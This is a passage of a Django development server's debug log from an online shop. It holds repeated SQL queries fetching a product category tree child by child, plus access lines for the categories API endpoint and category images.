"shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 13:40:46,228 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 13:40:46,231 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 13:40:46,234 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 13:40:46,237 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 13:40:46,240 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 13:40:46,243 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 13:40:46,246 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 13:40:46] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [18/Dec/2019 13:40:46] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [18/Dec/2019 13:40:47] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 DEBUG 2019-12-18 13:40:48,437 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 13:40:48,445 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 13:40:48,449 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 13:40:48,451 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 13:40:48,454 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 13:40:48,457 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 13:40:48,459 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 13:40:48,461 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 13:40:48,464 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 13:40:48,467 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 13:40:48,469 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 13:40:48,472 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 13:40:48,474 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 13:40:48,476 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 13:40:48,481 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 13:40:48,483 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 13:40:48,486 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 13:40:48,488 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 13:40:48,490 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 13:40:48,494 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 13:40:48,498 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 13:40:48,501 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 13:40:48,504 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 13:40:48,507 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 13:40:48,510 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 13:40:48,513 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 13:40:48,516 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 13:40:48,518 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 13:40:48,520 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 13:40:48,522 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 13:40:48,526 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 13:40:48,528 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 13:40:48,530 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 13:40:48,532 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 13:40:48,535 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 13:40:48,539 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 13:40:48,542 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 13:40:48,544 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 13:40:48,546 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 13:40:48,549 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 13:40:48,551 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 13:40:48,554 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 13:40:48,556 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 13:40:48,558 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 13:40:48,561 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 13:40:48,563 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 13:40:48] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 13:40:57,393 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 13:40:57,400 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 13:40:57,404 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 13:40:57,408 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 13:40:57,411 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 13:40:57,414 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 13:40:57,418 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 13:40:57,421 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 13:40:57,429 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 13:40:57,434 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 13:40:57,436 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 13:40:57,439 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 13:40:57,441 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-18 13:40:57,446 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 